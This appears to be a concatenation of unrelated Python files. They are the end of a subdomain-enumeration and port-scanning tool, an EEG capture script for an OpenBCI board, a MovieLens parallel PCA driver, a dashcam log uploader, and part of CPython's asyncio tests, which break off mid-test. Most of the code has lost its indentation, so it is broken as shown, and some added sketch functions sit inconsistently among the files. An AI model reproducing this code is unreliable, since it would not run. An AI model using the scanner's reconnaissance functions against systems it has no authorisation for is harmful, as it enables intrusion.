super(PassiveDNS, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception as e:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
if not resp:
return self.subdomains
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
try:
subdomains = json.loads(resp)
for subdomain in subdomains:
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception as e:
pass
class portscan():
def __init__(self, subdomains, ports):
self.subdomains = subdomains
self.ports = ports
self.lock = None
def port_scan(self, host, ports):
openports = []
self.lock.acquire()
for port in ports:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
result = s.connect_ex((host, int(port)))
if result == 0:
openports.append(port)
s.close()
except Exception:
pass
self.lock.release()
if len(openports) > 0:
print("%s%s%s - %sFound open ports:%s %s%s%s" % (G, host, W, R, W, Y, ', '.join(openports), W))
def run(self):
self.lock = threading.BoundedSemaphore(value=20)
for subdomain in self.subdomains:
t = threading.Thread(target=self.port_scan, args=(subdomain, self.ports))
t.start()
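# Hedged usage sketch (not part of the original tool): driving the portscan class above
# directly. Host names and ports below are illustrative; ports are given as strings
# because port_scan() joins them with ', ' when printing the results.
def example_portscan():
    scanner = portscan(['example.com', 'www.example.com'], ['80', '443'])
    scanner.run()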
def main(domain, threads, savefile, ports, silent, verbose, enable_bruteforce, engines):
bruteforce_list = set()
search_list = set()
if is_windows:
subdomains_queue = list()
else:
subdomains_queue = multiprocessing.Manager().list()
# Check Bruteforce Status
if enable_bruteforce or enable_bruteforce is None:
enable_bruteforce = True
# Validate domain
domain_check = re.compile("^(http|https)?[a-zA-Z0-9]+([\-\.]{1}[a-zA-Z0-9]+)*\.[a-zA-Z]{2,}$")
if not domain_check.match(domain):
if not silent:
print(R + "Error: Please enter a valid domain" + W)
return []
    if not (domain.startswith('http://') or domain.startswith('https://')):
domain = 'http://' + domain
parsed_domain = urlparse.urlparse(domain)
if not silent:
print(B + "[-] Enumerating subdomains now for %s" % parsed_domain.netloc + W)
if verbose and not silent:
print(Y + "[-] verbosity is enabled, will show the subdomains results in realtime" + W)
supported_engines = {'baidu': BaiduEnum,
'yahoo': YahooEnum,
'google': GoogleEnum,
'bing': BingEnum,
'ask': AskEnum,
'netcraft': NetcraftEnum,
'dnsdumpster': DNSdumpster,
'virustotal': Virustotal,
'threatcrowd': ThreatCrowd,
'ssl': CrtSearch,
'passivedns': PassiveDNS
}
chosenEnums = []
if engines is None:
chosenEnums = [
BaiduEnum, YahooEnum, GoogleEnum, BingEnum, AskEnum,
NetcraftEnum, DNSdumpster, Virustotal, ThreatCrowd,
CrtSearch, PassiveDNS
]
else:
engines = engines.split(',')
for engine in engines:
if engine.lower() in supported_engines:
chosenEnums.append(supported_engines[engine.lower()])
# Start the engines enumeration
enums = [enum(domain, [], q=subdomains_queue, silent=silent, verbose=verbose) for enum in chosenEnums]
for enum in enums:
enum.start()
for enum in enums:
enum.join()
subdomains = set(subdomains_queue)
for subdomain in subdomains:
search_list.add(subdomain)
if enable_bruteforce:
if not silent:
print(G + "[-] Starting bruteforce module now using subbrute.." + W)
record_type = False
path_to_file = os.path.dirname(os.path.realpath(__file__))
subs = os.path.join(path_to_file, 'subbrute', 'names.txt')
resolvers = os.path.join(path_to_file, 'subbrute', 'resolvers.txt')
process_count = threads
output = False
json_output = False
bruteforce_list = subbrute.print_target(parsed_domain.netloc, record_type, subs, resolvers, process_count, output, json_output, search_list, verbose)
subdomains = search_list.union(bruteforce_list)
if subdomains:
subdomains = sorted(subdomains, key=subdomain_sorting_key)
if savefile:
write_file(savefile, subdomains)
if not silent:
print(Y + "[-] Total Unique Subdomains Found: %s" % len(subdomains) + W)
if ports:
if not silent:
print(G + "[-] Start port scan now for the following ports: %s%s" % (Y, ports) + W)
ports = ports.split(',')
pscan = portscan(subdomains, ports)
pscan.run()
elif not silent:
for subdomain in subdomains:
print(G + subdomain + W)
return subdomains
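# Hedged sketch (not part of the original tool): calling main() above programmatically,
# e.g. after importing this module from another script. The engine list and keyword
# values are illustrative only and mirror the signature defined above.
def example_programmatic_scan():
    return main('example.com', threads=30, savefile=None, ports=None,
                silent=True, verbose=False, enable_bruteforce=False,
                engines='virustotal,ssl')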
def interactive():
args = parse_args()
domain = args.domain
threads = args.threads
savefile = args.output
ports = args.ports
enable_bruteforce = args.bruteforce
verbose = args.verbose
engines = args.engines
if verbose or verbose is None:
verbose = True
if args.no_color:
no_color()
banner()
res = main(domain, threads, savefile, ports, silent=False, verbose=verbose, enable_bruteforce=enable_bruteforce, engines=engines)
if __name__ == "__main__":
interactive()
|
capture_bci.py
|
from pylsl import StreamInlet, resolve_byprop, local_clock, TimeoutError
from pylsl import StreamInfo, StreamOutlet
from bci import open_bci_v3 as bci
import signal, sys, os, time, csv
import serial
import threading
import win32api as win
board = None
samples_lock = threading.Lock()
class Board(object):
LSL_STREAM_NAME = 'psychopy'
LSL_BCI_STREAM_NAME = 'bci'
LSL_BCI_NUM_CHANNELS = 8
    LSL_BCI_SAMPLE_RATE = 0  # 0 = IRREGULAR_RATE (unspecified sampling rate) in LSL
def __init__(self):
# check device manager for correct COM port.
self.board = bci.OpenBCIBoard(port='COM3', filter_data=True,
daisy=False)
# setup LSL
streams = resolve_byprop('name', self.LSL_STREAM_NAME, timeout=2.5)
try:
self.inlet = StreamInlet(streams[0])
except IndexError:
            raise ValueError('Make sure stream name="%s" is opened first.'
                             % self.LSL_STREAM_NAME)
self.running = True
self.samples = []
info = StreamInfo(self.LSL_BCI_STREAM_NAME, 'eeg',
self.LSL_BCI_NUM_CHANNELS, self.LSL_BCI_SAMPLE_RATE, 'float32', 'uid2')
self.outlet = StreamOutlet(info)
# LSL and BCI samples are synchronized to local_clock(), which is the
# runtime on this slave, not the host
def _record_lsl(self):
while self.running:
sample, timestamp = self.inlet.pull_sample(timeout=5)
# time correction to sync to local_clock()
try:
if timestamp is not None and sample is not None:
timestamp = timestamp + self.inlet.time_correction(timeout=5)
samples_lock.acquire()
self.samples.append(('STIM', timestamp, sample))
samples_lock.release()
except TimeoutError:
pass
print('closing lsl')
self.inlet.close_stream()
def _bci_sample(self, sample):
NUM_CHANNELS = 8
data = sample.channel_data[0:NUM_CHANNELS]
samples_lock.acquire()
self.samples.append(('BCI', local_clock(), data))
samples_lock.release()
self.outlet.push_sample(data)
def _record_bci(self):
try:
self.board.start_streaming(self._bci_sample)
except:
print('Got a serial exception. Expected behavior if experiment ending.')
def capture(self):
self.bci_thread = threading.Thread(target=self._record_bci)
self.lsl_thread = threading.Thread(target=self._record_lsl)
self.bci_thread.start()
self.lsl_thread.start()
def export_data(self):
self.board.stop()
self.board.disconnect()
self.running = False
self.bci_thread.join(5)
self.lsl_thread.join(5)
print('Joined threads, now outputting BCI data.')
i = 0
folder = '\\recorded_data\\BCI'
folder_path = os.getcwd() + folder
#new folders recorded_data/BCI will be created in current directory (where experiment.py is saved) if they don't exist
if not os.path.exists(folder_path):
os.makedirs(folder_path)
#file_path = os.path.normpath(folder_path + 'data-%s.csv')
file_path = folder_path + '\\data-%s.csv'
while os.path.exists(file_path % i):
i += 1
# csv writer with stim_type, msg, and timestamp, then data
with open(file_path % i, 'w+') as f:
writer = csv.writer(f)
writer.writerow(('Signal Type', 'Msg', 'Time', 'Channel 1', 'Channel 2', 'Channel 3', 'Channel 4', 'Channel 5', 'Channel 6', 'Channel 7', 'Channel 8' ))
for sample in self.samples:
signal_type, timestamp, datas = sample
out = (signal_type, 'msg', timestamp)
for data in datas:
out = out + (data,)
writer.writerow(out)
def __str__(self):
        return '%s EEG channels' % self.board.getNbEEGChannels()
def __del__(self):
self.board.disconnect()
self.inlet.close_stream()
def load(queue):
try:
global board
board = Board()
print('init board')
except:
if queue is not None:
queue.put('FAIL')
def start():
board.capture()
def stop(queue=None):
    board.export_data()
    print('Finished exporting data.')
    # queue is None when stop() is called from the signal handlers below
    if queue is not None:
        queue.put('SAVED_BCI')
#os._exit(0) # dirty, but it's ok because everything is already cleaned up
def sigint_handler(signal, frame):
stop()
def sigterm_handler(signal, frame):
stop()
def main():
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
load(queue=None)
start()
signal.pause()
def win_handler(dwCtrlhandler):
if dwCtrlhandler in (0,2,6):
return 1
#return 0
def begin(queue, event=None):
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
if sys.platform == 'win32':
win.SetConsoleCtrlHandler(win_handler,1)
load(queue)
queue.put('CONNECTED')
start()
try:
# linux signal handling
while True:
signal.pause()
except AttributeError:
# signal.pause() not implemented on windows
while not event.is_set():
time.sleep(1)
print('event was set in bci, stopping')
stop(queue)
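# Hedged sketch (not part of the original script): how a parent experiment process could
# drive begin() above via multiprocessing, reading the 'CONNECTED' / 'FAIL' / 'SAVED_BCI'
# messages it puts on the queue. All names below are illustrative.
def example_parent_process():
    import multiprocessing
    queue = multiprocessing.Queue()
    event = multiprocessing.Event()
    proc = multiprocessing.Process(target=begin, args=(queue, event))
    proc.start()
    print(queue.get())   # 'CONNECTED' once the board and LSL inlet are up ('FAIL' otherwise)
    time.sleep(10)       # ...the experiment itself would run here...
    event.set()          # ask the BCI process to stop streaming and export its data
    print(queue.get())   # 'SAVED_BCI' after export_data() completes
    proc.join()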
if __name__ == '__main__':
main()
|
main4.py
|
import numpy as np
from numpy import linalg as la
import time
import subprocess
from streaming import *
#import MovieLensNew as MovieLens
import MovieLens
from multiprocessing import Process
from multiprocessing import Array
import os  # os.close() is used in runBOI below
import sys
def runBOI(stream, k,id,arr,allT,nWorkers,doneWithBlock,cond, parentFiles):
# Sapirla: Workaround for this issue:
# http://bugs.python.org/issue12488
for pc in parentFiles:
os.close(pc)
sys.stderr = open("logs/Worker"+str(id)+".out", "a")
#sys.stderr.write('\n')
boi=ParallelBlockOrthogonal(
id=id,
arr=arr,
allT=allT,
doneWithBlock=doneWithBlock,
cond=cond,
k=k,
order=2,
stream=stream
)
for x in boi:
continue
print boi.getEstimate().T[:,0:3]
print np.dot(boi.getEstimate().T,np.loadtxt('mlpc.txt'))
return boi.getEstimate()
if __name__ == "__main__":
t0 = time.time()
p=65133
k=2
nWorkers=2
arr = Array('d', p*k)
allT = Array('I', nWorkers,lock=False)
doneWithBlock = Array('I', nWorkers,lock=False)
cond = Condition()
# Producer Stream
producer=StreamIMUX(
stream=MovieLens.UserStream(sparse=True, file='/var/datasets/ml-10M100K/ratingsTab.dat'),
nPipes=nWorkers
)
childrenStreams=producer.getChildrenStreams()
parentFiles=producer.getParentFiles()
processes=[]
for id in xrange(1,nWorkers+1):
arg={ 'id':id,
'stream':childrenStreams[id-1],
'k':k,
'arr':arr,
'allT':allT,
'nWorkers':nWorkers,
'doneWithBlock':doneWithBlock,
'cond':cond,
'parentFiles':parentFiles
}
processes += [Process(target=runBOI, kwargs=arg)]
processes[-1].start()
# Produce (serve samples to the created pipes)
for x in producer:
continue
# Join them
for id in xrange(1,nWorkers+1):
processes[id-1].join()
t1 = time.time()
total = t1-t0
print "Total time: ", total
#print np.dot(results[0].T,results[1])
|
uploader.py
|
#!/usr/bin/env python
import os
import time
import stat
import json
import random
import ctypes
import inspect
import requests
import traceback
import threading
from collections import Counter
from selfdrive.swaglog import cloudlog
from selfdrive.loggerd.config import ROOT
from common.params import Params
from common.api import api_get
fake_upload = os.getenv("FAKEUPLOAD") is not None
def raise_on_thread(t, exctype):
  '''Raises an exception of type exctype in the thread t'''
  for ctid, tobj in threading._active.items():
    if tobj is t:
      tid = ctid
      break
  else:
    raise Exception("Could not find thread")
  if not inspect.isclass(exctype):
    raise TypeError("Only types can be raised (not instances)")
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid),
ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# "if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, 0)
raise SystemError("PyThreadState_SetAsyncExc failed")
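# Hedged illustration (not part of the original uploader): raise_on_thread() above injects
# an exception asynchronously into a worker thread; abort_upload() below uses it to cancel
# a stuck upload. The worker here is illustrative only.
def _example_raise_on_thread():
  stopped = []
  def worker():
    try:
      while True:
        time.sleep(0.1)
    except SystemExit:
      stopped.append(True)
  t = threading.Thread(target=worker)
  t.start()
  time.sleep(0.3)
  raise_on_thread(t, SystemExit)  # delivered at the worker's next bytecode boundary
  t.join()
  return bool(stopped)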
def listdir_with_creation_date(d):
lst = os.listdir(d)
for fn in lst:
try:
st = os.stat(os.path.join(d, fn))
ctime = st[stat.ST_CTIME]
yield (ctime, fn)
except OSError:
cloudlog.exception("listdir_with_creation_date: stat failed?")
yield (None, fn)
def listdir_by_creation_date(d):
times_and_paths = list(listdir_with_creation_date(d))
return [path for _, path in sorted(times_and_paths)]
def clear_locks(root):
for logname in os.listdir(root):
path = os.path.join(root, logname)
try:
for fname in os.listdir(path):
if fname.endswith(".lock"):
os.unlink(os.path.join(path, fname))
except OSError:
cloudlog.exception("clear_locks failed")
class Uploader(object):
def __init__(self, dongle_id, access_token, root):
self.dongle_id = dongle_id
self.access_token = access_token
self.root = root
self.upload_thread = None
self.last_resp = None
self.last_exc = None
def clean_dirs(self):
try:
for logname in os.listdir(self.root):
path = os.path.join(self.root, logname)
# remove empty directories
if not os.listdir(path):
os.rmdir(path)
except OSError:
cloudlog.exception("clean_dirs failed")
def gen_upload_files(self):
if not os.path.isdir(self.root):
return
for logname in listdir_by_creation_date(self.root):
path = os.path.join(self.root, logname)
names = os.listdir(path)
if any(name.endswith(".lock") for name in names):
continue
for name in names:
key = os.path.join(logname, name)
fn = os.path.join(path, name)
yield (name, key, fn)
def get_data_stats(self):
name_counts = Counter()
total_size = 0
for name, key, fn in self.gen_upload_files():
name_counts[name] += 1
total_size += os.stat(fn).st_size
return dict(name_counts), total_size
def next_file_to_upload(self):
# try to upload log files first
for name, key, fn in self.gen_upload_files():
if name in ["rlog", "rlog.bz2"]:
return (key, fn, 0)
# then upload compressed camera file
for name, key, fn in self.gen_upload_files():
if name in ["fcamera.hevc"]:
return (key, fn, 1)
# then upload other files
for name, key, fn in self.gen_upload_files():
if not name.endswith('.lock') and not name.endswith(".tmp"):
return (key, fn, 1)
return None
def do_upload(self, key, fn):
try:
url_resp = api_get("v1.1/"+self.dongle_id+"/upload_url/", timeout=2, path=key, access_token=self.access_token)
url_resp_json = json.loads(url_resp.text)
url = url_resp_json['url']
headers = url_resp_json['headers']
cloudlog.info("upload_url v1.1 %s %s", url, str(headers))
if fake_upload:
cloudlog.info("*** WARNING, THIS IS A FAKE UPLOAD TO %s ***" % url)
class FakeResponse(object):
def __init__(self):
self.status_code = 200
self.last_resp = FakeResponse()
else:
with open(fn, "rb") as f:
self.last_resp = requests.put(url, data=f, headers=headers)
except Exception as e:
self.last_exc = (e, traceback.format_exc())
raise
def normal_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
try:
self.do_upload(key, fn)
except Exception:
pass
return self.last_resp
def killable_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
self.upload_thread = threading.Thread(target=lambda: self.do_upload(key, fn))
self.upload_thread.start()
self.upload_thread.join()
self.upload_thread = None
return self.last_resp
def abort_upload(self):
thread = self.upload_thread
if thread is None:
return
if not thread.is_alive():
return
raise_on_thread(thread, SystemExit)
thread.join()
def upload(self, key, fn):
# write out the bz2 compress
if fn.endswith("log"):
ext = ".bz2"
cloudlog.info("compressing %r to %r", fn, fn+ext)
if os.system("nice -n 19 bzip2 -c %s > %s.tmp && mv %s.tmp %s%s && rm %s" % (fn, fn, fn, fn, ext, fn)) != 0:
cloudlog.exception("upload: bzip2 compression failed")
return False
# assuming file is named properly
key += ext
fn += ext
try:
sz = os.path.getsize(fn)
except OSError:
cloudlog.exception("upload: getsize failed")
return False
cloudlog.event("upload", key=key, fn=fn, sz=sz)
cloudlog.info("checking %r with size %r", key, sz)
if sz == 0:
# can't upload files of 0 size
os.unlink(fn) # delete the file
success = True
else:
cloudlog.info("uploading %r", fn)
# stat = self.killable_upload(key, fn)
stat = self.normal_upload(key, fn)
if stat is not None and stat.status_code in (200, 201):
cloudlog.event("upload_success", key=key, fn=fn, sz=sz)
os.unlink(fn) # delete the file
success = True
else:
cloudlog.event("upload_failed", stat=stat, exc=self.last_exc, key=key, fn=fn, sz=sz)
success = False
self.clean_dirs()
return success
def uploader_fn(exit_event):
cloudlog.info("uploader_fn")
params = Params()
dongle_id, access_token = params.get("DongleId"), params.get("AccessToken")
if dongle_id is None or access_token is None:
cloudlog.info("uploader MISSING DONGLE_ID or ACCESS_TOKEN")
raise Exception("uploader can't start without dongle id and access token")
uploader = Uploader(dongle_id, access_token, ROOT)
while True:
backoff = 0.1
while True:
if exit_event.is_set():
return
d = uploader.next_file_to_upload()
if d is None:
break
key, fn, _ = d
cloudlog.info("to upload %r", d)
success = uploader.upload(key, fn)
if success:
backoff = 0.1
else:
cloudlog.info("backoff %r", backoff)
time.sleep(backoff + random.uniform(0, backoff))
backoff = min(backoff*2, 120)
cloudlog.info("upload done, success=%r", success)
time.sleep(5)
def main(gctx=None):
uploader_fn(threading.Event())
if __name__ == "__main__":
main()
|
test_base_events.py
|
"""Tests for base_events.py"""
import concurrent.futures
import errno
import math
import os
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def tearDownModule():
asyncio.set_event_loop_policy(None)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
if not support.IPV6_ENABLED:
return
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = self.loop.create_future()
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
class DummyExecutor(concurrent.futures.ThreadPoolExecutor):
def submit(self, fn, *args, **kwargs):
raise NotImplementedError(
'cannot submit into a dummy executor')
executor = DummyExecutor()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_set_default_executor_deprecation_warnings(self):
executor = mock.Mock()
with self.assertWarns(DeprecationWarning):
self.loop.set_default_executor(executor)
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = loop.create_future()
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop, None)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop, None)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop, None)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = self.loop.create_future()
other_loop = self.new_test_loop()
